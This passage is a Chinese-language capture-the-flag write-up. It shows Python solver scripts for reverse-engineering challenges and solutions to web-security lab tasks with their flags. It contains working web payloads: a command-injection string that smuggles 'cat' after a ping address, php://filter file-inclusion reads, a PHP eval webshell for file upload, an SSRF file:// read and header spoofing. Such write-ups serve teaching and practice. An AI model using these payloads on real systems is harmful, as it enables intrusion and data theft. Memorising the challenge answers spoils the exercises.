0xC6, 0x45, 0xD5, 0xE0, 0xC6, 0x45, 0xD6, 0x16, 0xC6, 0x45,
0xD7, 0x41, 0xC6, 0x45, 0xD8, 0x97, 0xC6, 0x45, 0xD9, 0xC0,
0xC6, 0x45, 0xDA, 0xF7, 0xC6, 0x45, 0xDB, 0xB2, 0xC6, 0x45,
0xDC, 0x06, 0xC6, 0x45, 0xDD, 0x52, 0xC6, 0x45, 0xDE, 0x06,
0xC6, 0x45, 0xDF, 0x01, 0xC6, 0x45, 0xE0, 0xD7, 0xC6, 0x45,
0xE1, 0x21, 0xC6, 0x45, 0xE2, 0x46, 0xC6, 0x45, 0xE3, 0xD0,
0xC6, 0x45, 0xE4, 0x36, 0xC6, 0x45, 0xE5, 0x40, 0xC6, 0x45,
0xE6, 0x97]
flag = ''
b=[]
for i in range(3,len(a),4):
#高低位互换
b.append(a[i]*16&0xff|a[i]>>4)
# b.append(a[i]*16|a[i]>>4)
pass
print(b)
flag +=chr(b[0])
for i in range(1,len(b)):
flag +=chr(b[i]^b[i-1])
print(flag)
flag{youmusTKEEpmoving}
* re5
a1=[]
a2=[
0x7E, 0x74, 0x75, 0x7F, 0x67, 0x63, 0x24, 0x63, 0x60, 0x65,
0x74, 0x6D, 0x24, 0x7D, 0x43, 0x25, 0x7A, 0x69]
b=[]
v5=[]
v4=[]
v3=[]
v7=18
flag=''
for i in range(0,18,3):
print(i)
v5.append(a2[i])
v5.append(a2[i+1])
v5.append(a2[i+2])
print(v5[i])
flag+=(chr((v7^v5[i])-6))
flag+=(chr((v5[i+1]^v7)+6))
flag+=chr(v5[i+2]^6^v7)
print(flag)
flag{w0wtqly0uW1n}
四、红蓝安全攻防演练-WEB安全
1. 靶场Web题目讲解
* 题目整体一览
* 代理拦截讲解
* php的有趣的特性
- 题目
题目: php弱类型语言 解题方式: 请求头加:?a=PJNPDWY&b=QNKCDZO&c=123&d=php://input 请求体为: 123
flag{ab4ea15bd59038a6c7b823ebeee4b8ba}
* phpBestLanguage
- 题目
题目:http://172.31.27.248:8109 php世界上最好的语言 解题: 请求头:?ac=123&fn=php://input 请求体:123
flag{5592f1a9fa885a77ba55497e501a101a}
* 命令执行-ping ping ping
- 题目
解题: 127.0.0.1 | ls 127.0.0.1 | cat f14g_saikjmld98401294.php
flag{random_php_flag_there}
* 文件包含2
- 题目
题目:http://172.31.27.248:8107 你能读到flag.php的内容吗 解题:http://172.31.27.248:8107/index.php?file=php://filter/read=convert.base64-encode/resource=flag.php 使读到的文件内容为base64,然后解密
flag{792b5e3054812cfe1f41ba3dda2a2948}
- 文件包含
题目:http://172.31.27.248:8106 flag在根目录! 解题:http://172.31.27.248:8106/index.php?file=/flag
flag{d41d8cd98f00b204e9800998ecf8427e}
* 文件上传
- 题目
题目:http://172.31.27.248:8103 只能上传gif!!! 解题: <?php @eval($_POST[ljj]); ?>
flag = "flag{ffffffffllllaaggg_!!!}
* ssrf
- 题目
题目:http://172.31.27.248:8102 解题:http://172.31.27.248:8102/?url=file:///flag.txt
flag{4787370fb09bd230f863731d2ffbff6a}
* xff
- 题目
题目:http://172.31.27.248:8101 请从本地访问服务 解题: x-forwarded-for:127.0.0.1 referer:http://127.0.0.1
flag{15cc8eee88302965c61497c147e6ca4c}
* WEB-GET
- 题目
题目:http://172.31.27.248:1024/ 解题:http://172.31.27.248:1024/?what=flag
flag{Bugku_get_su8kej2en}